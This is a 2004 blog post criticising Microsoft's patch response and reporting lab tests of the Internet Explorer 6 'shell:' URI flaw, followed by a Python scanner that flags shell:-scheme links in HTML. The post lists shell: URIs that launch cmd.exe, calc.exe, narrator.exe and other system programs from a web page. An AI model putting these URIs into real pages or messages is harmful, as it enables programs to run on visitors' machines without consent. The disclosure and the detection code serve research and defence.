QODS ec

Saturday, July 10, 2004

SEC: shell: research

shell: research

I think the research over the past couple days proves that M$ just isn't
cutting it these days with their security response to vulnerabilities.
Wasn't it just the other day when Bill Gates said that they have 1000's of
consultants ready to patch systems, and it STILL takes them weeks to patch a simple hole? I understand that M$ has to deal with the underlying OS, but
with that many people shouldn't they turn patches out a little faster?
I mean, come on.. I worked with the Mozilla guys and was REALLY impressed
with the turn-around on the patch. It wasn't real elaborate to correct the issue, but it was done in a matter of hours.

The shell: issue is all over Full-disclosure and Slashdot, but I have yet to see a public response from M$ on the issue.

I hope this helps Mozilla gain some market share, because it's where browsing and security models should move in the future, in my opinion.

----------end Rant---------------

M$ IE6 shell: vuln tested on fully patched XP SP1 box in VMware lab

shell:windows\system32\calc.exe
shell:windows\system32\cmd.exe
shell:windows\system32\winver.exe
shell:windows\system32\accwiz.exe

shell:windows\system32\narrator.exe <- This is my favorite one :) This will freak someone out when the PC talks to them.

I guess the good side to this is that IE asks the user to open / save the file when it is clicked from an anchor, but not when using the shell command.
test <- this calls cmd.exe using an anchor tag



I understand the disclosure process, but what can you do if they don't respond? This isn't a canned script kiddie exploit; it's research. And that should be available to anyone that is interested.

--------------

I got 99 problems but Mozilla isn't one :)
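
For anyone filtering pages or mail at a gateway, links using the `shell:` scheme listed above can be flagged before they reach the browser. The following is an added example, not code from the original post; the attribute list, the normalization rules (taken from how modern URL parsers strip tabs and newlines, not from IE6's own parser) and the sample HTML are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that can carry a URL the browser will load or navigate to.
URL_ATTRS = {"href", "src", "action", "data", "background"}

def scheme_of(value):
    """Return the lower-cased URL scheme of an attribute value, or None."""
    # Assumption: normalize the way modern URL parsers do (drop leading
    # control characters/spaces, drop tabs and newlines anywhere).
    cleaned = re.sub(r"^[\x00-\x20]+", "", value)
    cleaned = re.sub(r"[\t\r\n]", "", cleaned)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return m.group(1).lower() if m else None

class ShellLinkFinder(HTMLParser):
    """Collect (line, tag, attribute, value) for every blocked-scheme URL."""
    def __init__(self, blocked=("shell",)):
        super().__init__()
        self.blocked = set(blocked)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references such as &#115;
        for name, value in attrs:
            if name in URL_ATTRS and value and scheme_of(value) in self.blocked:
                self.hits.append((self.getpos()[0], tag, name, value))

def find_shell_links(html_text):
    """Parse html_text and return the list of flagged attributes."""
    finder = ShellLinkFinder()
    finder.feed(html_text)
    finder.close()
    return finder.hits

# Constructed sample page; the paths are the ones listed in the post.
SAMPLE = r"""<p>constructed test page</p>
<a href="shell:windows\system32\calc.exe">one</a>
<a href="SHELL:windows\system32\winver.exe">two</a>
<iframe src="&#115;hell:windows\system32\cmd.exe"></iframe>
<a href=" sh&#9;ell:windows\system32\accwiz.exe">three</a>
<a href="http://example.com/shell:notes.html">benign</a>
<a href="shell.html">benign relative link</a>
"""

if __name__ == "__main__":
    for line, tag, attr, value in find_shell_links(SAMPLE):
        print(f"line {line}: <{tag} {attr}={value!r}>")
```

The two benign links are not reported because the check looks only at the scheme position, so a `shell:` substring later in a path or a file named `shell.html` does not match.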
